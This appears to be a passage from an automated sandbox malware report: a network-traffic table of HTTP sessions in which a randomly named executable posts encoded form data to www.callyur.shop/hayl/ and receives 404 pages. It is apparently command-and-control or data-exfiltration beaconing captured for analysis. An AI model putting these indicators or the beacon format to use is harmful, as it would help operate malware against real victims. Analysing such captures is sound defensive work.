Jan 11, 2025 09:35:50.542288065 CET	1236	IN	Data Raw: 1b 2e 4a 7c 3c 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 8d 6d 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 d0 1c 99 e2 da 1d 8d b0 04 ad 76 b1 c1 f0 c1 4c 1a 47 c3 b4 9e Data Ascii: .J\|<%..?,m[Y3\J'6&]4d,xG1!V"vLG<[/y]v<BBM3MF{5F"yV90{cT][\|x:" GwcvpZ"pp);vLa3qe-xrF(bJ-pF-#;rRe);P\|[ITK(IZE
Jan 11, 2025 09:35:50.542303085 CET	1236	IN	Data Raw: 68 43 00 a7 56 99 a6 3d 1f 17 71 bd 6a 02 8e 59 33 98 45 48 a7 0e 26 8c 6e 5e 74 94 9f 9d ec 0d 62 f0 fe 82 38 61 73 5c 84 8c 98 dc 4a 30 d1 64 f6 b0 d8 45 34 ce e4 0d 9e 1e bc 25 9c 06 fa 88 42 41 68 56 86 15 b1 70 37 9d d6 d5 51 ea d7 53 74 49 Data Ascii: hCV=qjY3EH&n^tb8as\J0dE4%BAhVp7QStIzKb'TX!Y2Nax(fxdarR^iXc,mO}iH!t7^'K_Q"9x3VduNgxN,ix:$q-HF2T])m
Jan 11, 2025 09:35:50.542319059 CET	283	IN	Data Raw: f6 76 c1 7c 37 80 7f 42 fe 4a a8 eb 2b e5 4f 64 b9 66 ff 16 a8 9f a1 e9 4f 2f 70 fa f3 a7 4a b8 c8 f9 de 84 d7 1b 3d 0f ff 91 a2 80 16 df c9 fe ac a1 bb 6f 8f f0 67 ab 1e e1 8f ac 72 83 a3 0f f8 ba 0a 04 af 2c 3e 3e 17 f0 de eb f9 97 41 f5 ea da Data Ascii: v\|7BJ+OdfO/pJ=ogr,>>AJeu^fuaOmkWt]zJrx@Dx^oUMxuL\|ooe Ou~~l,=a:{)"}c@}`gY7y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49990	66.29.137.10	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:52.328110933 CET	833	OUT	POST /hayl/ HTTP/1.1 Host: www.callyur.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.callyur.shop Referer: http://www.callyur.shop/hayl/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 46 78 73 34 5a 72 6c 49 47 4b 54 37 43 43 55 59 2f 77 33 6a 42 45 35 30 46 46 6d 61 6a 33 6c 77 31 48 78 55 67 70 2b 69 6f 74 66 54 42 75 79 5a 61 67 69 62 4f 58 41 71 43 49 67 61 46 65 31 65 61 76 33 47 35 41 71 45 56 63 33 45 36 66 6e 53 41 62 69 52 79 4f 45 62 6a 63 75 50 49 58 47 5a 32 6a 72 57 73 2f 67 71 4b 76 36 6a 63 33 4f 5a 64 4c 55 6f 2f 51 52 76 30 42 45 6a 38 61 2b 71 34 4a 57 34 78 62 52 39 74 5a 49 71 45 58 68 34 30 70 56 4c 6f 6a 4d 59 63 4b 30 35 33 39 75 77 4b 57 79 30 33 44 33 6f 42 63 50 62 6e 2b 47 38 32 56 6b 56 64 63 49 71 70 66 4e 79 34 3d Data Ascii: 40G=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4Fxs4ZrlIGKT7CCUY/w3jBE50FFmaj3lw1HxUgp+iotfTBuyZagibOXAqCIgaFe1eav3G5AqEVc3E6fnSAbiRyOEbjcuPIXGZ2jrWs/gqKv6jc3OZdLUo/QRv0BEj8a+q4JW4xbR9tZIqEXh40pVLojMYcK0539uwKWy03D3oBcPbn+G82VkVdcIqpfNy4=
Jan 11, 2025 09:35:52.935231924 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Sat, 11 Jan 2025 08:35:52 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f [TRUNCATED] Data Ascii: 134CZJvLmH$$pv5dNQU]]uQ(g9y~{'nLUo]~&neU~ycr:~z{UnTW=u)~}W>]X- V>5YQ]MkCmeaZ}i[~NF @$S~\|VeYbwE]vYz9/Sy@;a@`/mt>P"anJ`9Bl~#e&a:MpG0Ow0K-ne[@8Fnwzf>v=%ZqM\[My}zze/meeUu7/y6? Gyg&Se^}UZ>Rx#?_\|4A:6+)o9>I7d#8'@A4zs;Vo)nj#<YWzuLs9L`bsj\|0b^%OAVWeB~oWnwx]Ix8wXC'x#o^@Nrg1abf.?u+_sbM^R6+=HrT~I@W KYxSz125?V{:3>"m?Q
Jan 11, 2025 09:35:52.935245991 CET	1236	IN	Data Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1a fc 29 01 81 f4 c5 30 a3 21 95 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e Data Ascii: @o-q)0!w7dA 57#ao,}Od?yo+nY0{Q%~p(hi\|{.!^~E}F>xazOyIhw)J=#>BAX!E`c3Y\W8a*~+z`U$
Jan 11, 2025 09:35:52.935257912 CET	448	IN	Data Raw: 1b 2e 4a 7c 3c 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 8d 6d 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 d0 1c 99 e2 da 1d 8d b0 04 ad 76 b1 c1 f0 c1 4c 1a 47 c3 b4 9e Data Ascii: .J\|<%..?,m[Y3\J'6&]4d,xG1!V"vLG<[/y]v<BBM3MF{5F"yV90{cT][\|x:" GwcvpZ"pp);vLa3qe-xrF(bJ-pF-#;rRe);P\|[ITK(IZE
Jan 11, 2025 09:35:52.935318947 CET	1236	IN	Data Raw: 2a 5b f3 fb 19 45 93 e4 50 d3 66 c8 5c 29 56 07 ac 0a 37 9e 3d 49 03 24 50 a5 dc e4 d7 c2 21 61 68 17 db 8f 49 03 6f e5 2e cc 42 be d0 13 2c ad 03 87 d2 74 96 a6 a4 76 a5 d3 1b 74 31 52 e9 72 5f b1 ea 49 96 fd 69 0e a1 b0 64 75 47 81 d6 cf c5 04 Data Ascii: *[EPf\)V7=I$P!ahIo.B,tvt1Rr_IiduGTCW4L7G9A^'u4jbQ\20T2$Bx7vLfn$v#\hsDr\|X@mE^0l'I99%g%M-j,#g\vVp=#Q
Jan 11, 2025 09:35:52.935328960 CET	224	IN	Data Raw: 5c de 93 27 54 91 94 23 b4 77 77 20 61 3a 14 31 24 47 ad 6a 7a 0a 95 ef 18 1b f1 a1 e9 2c 9c 99 a1 52 8c 0b a2 41 77 45 e3 ec 2b eb 9c a3 c3 d5 92 5d 78 bb 3c 97 43 81 1b 86 eb 63 81 8d d0 6c 9d 45 c6 90 9e 8e 0d 72 22 a4 5b a9 6d c9 44 84 a2 39 Data Ascii: \'T#ww a:1$Gjz,RAwE+]x<CclEr"[mD9tjs84b}[ ZUcA@0$]$32i%&6a0@3^-4EYs?g}j(lA\|Rm\lBn4Z,,SH>h36
Jan 11, 2025 09:35:52.935606956 CET	852	IN	Data Raw: 8c c2 8c 36 11 bd a7 d0 e8 4c 79 7c 46 2a 16 52 d0 9a 69 50 33 8d df 80 dc 17 d1 96 e5 a5 ba 1a 6e 79 41 54 59 76 6f a7 5d 1e 48 bc aa a6 c1 d6 1e 6f 23 5d a9 c5 00 67 5b 6a ba ad 5c 97 5d 8f 76 07 1f 6e 6b 8b 32 85 18 df 36 9c a1 9e 60 1b a6 1b Data Ascii: 6Ly\|F*RiP3nyATYvo]Ho#]g[j\]vnk26`[]_Luh?A&>-\7?\|.1?EPQ\|T4^Wosw6;U=2Au}z>/c;M}zb@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49991	66.29.137.10	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:54.875080109 CET	1846	OUT	POST /hayl/ HTTP/1.1 Host: www.callyur.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.callyur.shop Referer: http://www.callyur.shop/hayl/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 32 73 6f 56 59 2f 42 43 4b 77 52 78 6f 61 68 37 6c 68 5a 66 65 53 38 55 64 42 31 6b 44 42 44 39 56 65 31 72 54 58 44 56 52 34 4e 78 74 4c 52 72 6b 70 47 4b 43 4c 43 43 64 34 2f 4c 33 6a 42 5a 35 30 39 4a 6d 64 72 34 6c 32 35 48 72 31 41 70 32 77 51 74 4d 7a 42 75 74 4a 61 68 38 72 4f 34 41 71 53 4d 67 62 31 65 31 65 61 76 33 48 4a 41 6f 56 56 63 31 45 36 51 77 69 41 66 70 78 79 6d 45 62 36 6e 75 50 39 69 46 74 36 6a 73 31 45 2f 37 2f 57 76 78 6a 63 31 4e 5a 63 4d 55 6f 79 51 52 76 34 72 45 69 49 77 2b 71 41 4a 58 35 56 46 4e 4d 31 47 63 35 6f 78 6a 37 77 62 57 59 55 42 55 4a 55 6f 79 72 6a 49 71 58 65 30 38 6b 4c 2f 36 50 31 5a 53 71 6a 50 4e 4e 43 39 6c 42 6f 69 54 5a 6f 55 61 55 68 68 72 47 77 44 50 61 76 75 31 6a 74 32 32 2b 67 6d 76 5a 62 52 6b 77 6e 4d 73 65 6c 2f 6e 73 6f 6e 78 74 68 66 69 52 57 72 79 52 44 65 2b 4e 75 76 67 72 63 5a 39 45 66 43 4f 74 50 6d 54 59 4d 34 42 57 59 77 41 35 68 7a 49 6f 32 48 4f 61 49 31 4a 76 33 62 37 4c 76 53 52 37 4f 44 71 49 78 42 31 6c 6b 66 33 69 [TRUNCATED] Data Ascii: 40G=2soVY/BCKwRxoah7lhZfeS8UdB1kDBD9Ve1rTXDVR4NxtLRrkpGKCLCCd4/L3jBZ509Jmdr4l25Hr1Ap2wQtMzButJah8rO4AqSMgb1e1eav3HJAoVVc1E6QwiAfpxymEb6nuP9iFt6js1E/7/Wvxjc1NZcMUoyQRv4rEiIw+qAJX5VFNM1Gc5oxj7wbWYUBUJUoyrjIqXe08kL/6P1ZSqjPNNC9lBoiTZoUaUhhrGwDPavu1jt22+gmvZbRkwnMsel/nsonxthfiRWryRDe+NuvgrcZ9EfCOtPmTYM4BWYwA5hzIo2HOaI1Jv3b7LvSR7ODqIxB1lkf3iRsNfTNaIeN6NFh91RXYdTBtjs2YTudHqVwiDD+35EtoP02sKSFeJ3qdUg6dLtemFkXFGAdKxaWVR6RUNpnzgnA4v2Lf+Xv3ZHkkVRaKgWXFaTWm9jBwey8S0TO1XgLRmHuXGwQBS3BUONsId3vYWl/HfJeDAVaQTDTXn+2+3vE7YcOlfGzDuPpFryh4JnaFfusH5d6pQx99ClOnfy/6QeDCzv3qdU16wesb88blUJz9zfQvcov7iL7S9ft1l+AyYjYIVu1lfz4VHOaXImAIC0HYao3LaaGs/IsUeBVucbmRddi5J46Bs9rtODUjFYlK+o+GDlkfGMt1obctfnxQ9Tk/YB/xXTyRPpovvR5aC20CEeAvm8IfO0PVZ7OxEAoNAvWQrwlDoHXi/6olR2wRTPsfnysplB1JuMfWYH6GDMlOtZrqqIaScgtcBUBlPTcH00PFxROst/FvSgVw9IO//LUTqmTWqKwKT3uggPqXn72R7emcIzsSZZuaBkLyqYz/7oDlFRS9u9Au3xKU/U1q+9vsCXo/Lo1P3kUoIYYePMV4KNAg1zWvfJLp1z52zJUlQUAvYNYOJNkmXuNXWQdqbck6PCarDeEptDAGBMUhIc1lVI0F8hI7Q8gAkLSMiqc+N2zcyP9a+LOe7q733KcrLrd1i+wOufOw4WK [TRUNCATED]
Jan 11, 2025 09:35:55.513807058 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Sat, 11 Jan 2025 08:35:55 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 83 a8 a9 ea 19 6d 48 02 24 24 81 00 e1 70 dc 10 da d1 8a 76 98 f0 03 f9 35 fc 64 4e 51 55 5d 14 5d 75 bb c7 e1 1f ce fe 51 28 97 93 67 f9 ce 39 d9 79 f2 b7 df 7e 7b fc 27 6e c1 ae 4c 95 1f 04 55 12 7f fb ed f1 f9 cf 00 b4 c7 c0 b5 9c 6f bf 5d 7e 26 6e 65 81 19 55 7e ef 1e eb b0 79 ba 63 b3 b4 72 d3 ea be 3a e5 ee dd c0 7e fe 7a ba ab dc ae 82 7b 12 7f 19 d8 81 55 94 6e f5 54 57 de 3d 75 f7 29 1d cb 0e dc fb 7e 7d 91 c5 57 84 d2 ec de ee 87 3e 5d a8 16 96 9f 58 ff c8 0a be cb c3 c2 2d af 96 20 ef a8 a7 56 e2 3e dd 35 a1 db e6 59 51 5d 4d 6b 43 a7 0a 9e 1c b7 09 6d f7 fe f2 f1 65 10 a6 61 15 5a f1 7d 69 5b b1 fb 84 7e fd 4e aa 0a ab d8 fd 46 20 c4 40 c9 aa c1 24 ab 53 e7 11 7e ee 7c 56 65 59 9d 62 77 d0 eb ed 45 5d 76 59 be f0 d1 ab 7a 9f 39 a7 c1 df 2f 53 fb cf be 79 40 3b f7 9e 95 84 f1 e9 61 40 17 60 db 2f 03 d1 8d 1b b7 0a 6d eb cb a0 b4 d2 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f [TRUNCATED] Data Ascii: 134CZJvLmH$$pv5dNQU]]uQ(g9y~{'nLUo]~&neU~ycr:~z{UnTW=u)~}W>]X- V>5YQ]MkCmeaZ}i[~NF @$S~\|VeYbwE]vYz9/Sy@;a@`/mt>P"anJ`9Bl~#e&a:MpG0Ow0K-ne[@8Fnwzf>v=%ZqM\[My}zze/meeUu7/y6? Gyg&Se^}UZ>Rx#?_\|4A:6+)o9>I7d#8'@A4zs;Vo)nj#<YWzuLs9L`bsj\|0b^%OAVWeB~oWnwx]Ix8wXC'x#o^@Nrg1abf.?u+_sbM^R6+=HrT~I@W KYxSz125?V{:3>"m?Q
Jan 11, 2025 09:35:55.513828993 CET	1236	IN	Data Raw: 40 09 fc cd 0c 6f fc fc 2d 71 9d d0 1a fc 29 01 81 f4 c5 30 a3 21 95 77 7f be d9 e6 16 b5 37 c3 bd f2 f2 ac bc 64 a8 87 41 e1 c6 20 d6 35 37 0e d8 cf e9 23 16 f0 9f f6 61 10 84 8e e3 a6 6f 2c f5 a3 7d bb ca 4f 17 64 3f fb f5 fb 79 6f ec f7 2b 6e Data Ascii: @o-q)0!w7dA 57#ao,}Od?yo+nY0{Q%~p(hi\|{.!^~E}F>xazOyIhw)J=#>BAX!E`c3Y\W8a*~+z`U$
Jan 11, 2025 09:35:55.513840914 CET	1236	IN	Data Raw: 1b 2e 4a 7c 3c 87 25 b3 0d 17 9d 2e fa 2e 3f b3 93 bd 2c 8d 6d 5b d4 59 a7 33 5c d3 4a 27 b9 36 95 19 83 93 26 5d 8b da c1 34 64 e8 2c 89 ce 78 47 e0 31 94 d6 1b 21 d9 04 91 56 22 d6 d0 1c 99 e2 da 1d 8d b0 04 ad 76 b1 c1 f0 c1 4c 1a 47 c3 b4 9e Data Ascii: .J\|<%..?,m[Y3\J'6&]4d,xG1!V"vLG<[/y]v<BBM3MF{5F"yV90{cT][\|x:" GwcvpZ"pp);vLa3qe-xrF(bJ-pF-#;rRe);P\|[ITK(IZE
Jan 11, 2025 09:35:55.513853073 CET	672	IN	Data Raw: 68 43 00 a7 56 99 a6 3d 1f 17 71 bd 6a 02 8e 59 33 98 45 48 a7 0e 26 8c 6e 5e 74 94 9f 9d ec 0d 62 f0 fe 82 38 61 73 5c 84 8c 98 dc 4a 30 d1 64 f6 b0 d8 45 34 ce e4 0d 9e 1e bc 25 9c 06 fa 88 42 41 68 56 86 15 b1 70 37 9d d6 d5 51 ea d7 53 74 49 Data Ascii: hCV=qjY3EH&n^tb8as\J0dE4%BAhVp7QStIzKb'TX!Y2Nax(fxdarR^iXc,mO}iH!t7^'K_Q"9x3VduNgxN,ix:$q-HF2T])m
Jan 11, 2025 09:35:55.523658991 CET	852	IN	Data Raw: 8c c2 8c 36 11 bd a7 d0 e8 4c 79 7c 46 2a 16 52 d0 9a 69 50 33 8d df 80 dc 17 d1 96 e5 a5 ba 1a 6e 79 41 54 59 76 6f a7 5d 1e 48 bc aa a6 c1 d6 1e 6f 23 5d a9 c5 00 67 5b 6a ba ad 5c 97 5d 8f 76 07 1f 6e 6b 8b 32 85 18 df 36 9c a1 9e 60 1b a6 1b Data Ascii: 6Ly\|F*RiP3nyATYvo]Ho#]g[j\]vnk26`[]_Luh?A&>-\7?\|.1?EPQ\|T4^Wosw6;U=2Au}z>/c;M}zb@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49992	66.29.137.10	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:35:57.419076920 CET	544	OUT	GET /hayl/?40G=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKQFF042Tw+6VIfe83rRo/9u22lJBgGdg0kCVzRF/7zaQBZrR0t81edm/&I6=x8CX HTTP/1.1 Host: www.callyur.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:35:57.996211052 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked date: Sat, 11 Jan 2025 08:35:57 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 32 37 37 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED] Data Ascii: 2774<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
Jan 11, 2025 09:35:57.996287107 CET	1236	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
Jan 11, 2025 09:35:57.996325016 CET	1236	IN	Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
Jan 11, 2025 09:35:57.996359110 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
Jan 11, 2025 09:35:57.996397972 CET	896	IN	Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34 Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
Jan 11, 2025 09:35:57.996432066 CET	1236	IN	Data Raw: 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48 Data Ascii: I9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7
Jan 11, 2025 09:35:57.996468067 CET	224	IN	Data Raw: 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 67 65 6a 65 6d 36 56 73 7a 77 61 4e 4a 35 49 51 54 39 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d Data Ascii: BdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6H
Jan 11, 2025 09:35:57.996499062 CET	1236	IN	Data Raw: 4e 37 55 59 6c 4a 6d 75 73 6c 70 57 44 55 54 64 59 61 62 34 4c 32 7a 31 76 34 30 68 50 50 42 76 77 7a 71 4f 6c 75 54 76 68 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f Data Ascii: N7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuT
Jan 11, 2025 09:35:57.996536016 CET	224	IN	Data Raw: 20 34 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c Data Ascii: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">404</span> <span class="
